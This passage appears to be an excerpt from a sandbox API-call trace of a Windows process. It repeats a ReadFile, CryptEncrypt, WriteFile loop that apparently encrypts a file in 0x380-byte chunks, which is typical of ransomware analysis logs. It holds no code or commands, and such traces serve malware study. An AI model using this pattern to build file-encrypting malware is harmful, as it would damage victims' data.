lpOverlapped=0x0) returned 1 [0281.735] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.735] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.735] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.736] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.736] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.736] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.736] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.736] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.737] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.737] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.737] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.737] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.737] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.738] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.738] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.738] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.738] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.738] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.739] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.739] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.739] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.739] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.739] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.740] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.740] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.740] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.740] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.740] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.740] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.741] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.741] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.741] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.741] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.741] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.742] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.742] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.742] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.742] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.742] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.742] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.743] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.755] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.755] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.755] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 